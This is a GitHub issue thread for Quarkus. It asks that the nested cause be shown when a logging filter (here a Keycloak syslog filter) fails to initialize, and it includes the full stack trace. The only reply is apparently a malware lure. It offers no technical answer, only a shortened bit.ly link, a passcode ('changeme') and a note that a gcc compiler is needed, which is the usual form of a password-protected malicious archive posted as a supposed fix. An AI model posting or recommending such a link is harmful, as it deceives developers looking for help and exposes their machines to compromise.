### ISSUE TITLE
Show exception cause during logging filter initialization

### ISSUE THREAD

**Issue by mabartos** [quarkusio/quarkus#43051]
### Description

When there is some exception thrown during the [logging Filter](https://quarkus.io/guides/logging#add-a-logging-filter-to-your-log-handler) initialization, the exception cause is not properly propagated, and users do not know what exactly happened. 

It'd be great to see what nested exception caused the failure of the initialization.

```
ERROR: Failed to start server in (development) mode
Error details:
java.lang.RuntimeException: Unable to create instance of Logging Filter 'org.keycloak.quarkus.runtime.configuration.filters.SyslogLogLevelFilter'
        at io.quarkus.runtime.logging.LoggingSetupRecorder$4.accept(LoggingSetupRecorder.java:272)
        at io.quarkus.runtime.logging.LoggingSetupRecorder$4.accept(LoggingSetupRecorder.java:266)
        at java.base/java.util.HashMap.forEach(HashMap.java:1429)
        at io.quarkus.runtime.logging.LoggingSetupRecorder.createNamedFilters(LoggingSetupRecorder.java:266)
        at io.quarkus.runtime.logging.LoggingSetupRecorder.initializeLogging(LoggingSetupRecorder.java:141)
        at io.quarkus.deployment.steps.LoggingResourceProcessor$setupLoggingRuntimeInit2024815463.deploy_0(Unknown Source)
        at io.quarkus.deployment.steps.LoggingResourceProcessor$setupLoggingRuntimeInit2024815463.deploy(Unknown Source)
        at io.quarkus.runner.ApplicationImpl.doStart(Unknown Source)
        at io.quarkus.runtime.Application.start(Application.java:101)
        at io.quarkus.runtime.ApplicationLifecycleManager.run(ApplicationLifecycleManager.java:119)
        at io.quarkus.runtime.Quarkus.run(Quarkus.java:71)
        at org.keycloak.quarkus.runtime.KeycloakMain.start(KeycloakMain.java:141)
        at org.keycloak.quarkus.runtime.cli.command.AbstractStartCommand.run(AbstractStartCommand.java:42)
        at picocli.CommandLine.executeUserObject(CommandLine.java:2030)
        at picocli.CommandLine.access$1500(CommandLine.java:148)
        at picocli.CommandLine$RunLast.executeUserObjectOfLastSubcommandWithSameParent(CommandLine.java:2465)
        at picocli.CommandLine$RunLast.handle(CommandLine.java:2457)
        at picocli.CommandLine$RunLast.handle(CommandLine.java:2419)
        at picocli.CommandLine$AbstractParseResultHandler.execute(CommandLine.java:2277)
        at picocli.CommandLine$RunLast.execute(CommandLine.java:2421)
        at picocli.CommandLine.execute(CommandLine.java:2174)
        at org.keycloak.quarkus.runtime.cli.Picocli.parseAndRun(Picocli.java:138)
        at org.keycloak.quarkus.runtime.KeycloakMain.main(KeycloakMain.java:101)
        at java.base/jdk.internal.reflect.DirectMethodHandleAccessor.invoke(DirectMethodHandleAccessor.java:103)
        at java.base/java.lang.reflect.Method.invoke(Method.java:580)
        at io.quarkus.bootstrap.runner.QuarkusEntryPoint.doRun(QuarkusEntryPoint.java:62)
        at io.quarkus.bootstrap.runner.QuarkusEntryPoint.main(QuarkusEntryPoint.java:33)
Exception in thread "Shutdown thread" java.lang.NullPointerException: Cannot invoke "io.quarkus.runtime.Application.isStarted()" because "app" is null
        at io.quarkus.runtime.ApplicationLifecycleManager$ShutdownHookThread.run(ApplicationLifecycleManager.java:455)

```

**Comment by sanketkorde** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler
